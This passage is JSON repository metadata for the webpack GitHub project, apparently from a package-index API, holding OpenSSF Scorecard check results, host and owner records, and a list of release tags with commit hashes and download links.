e457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.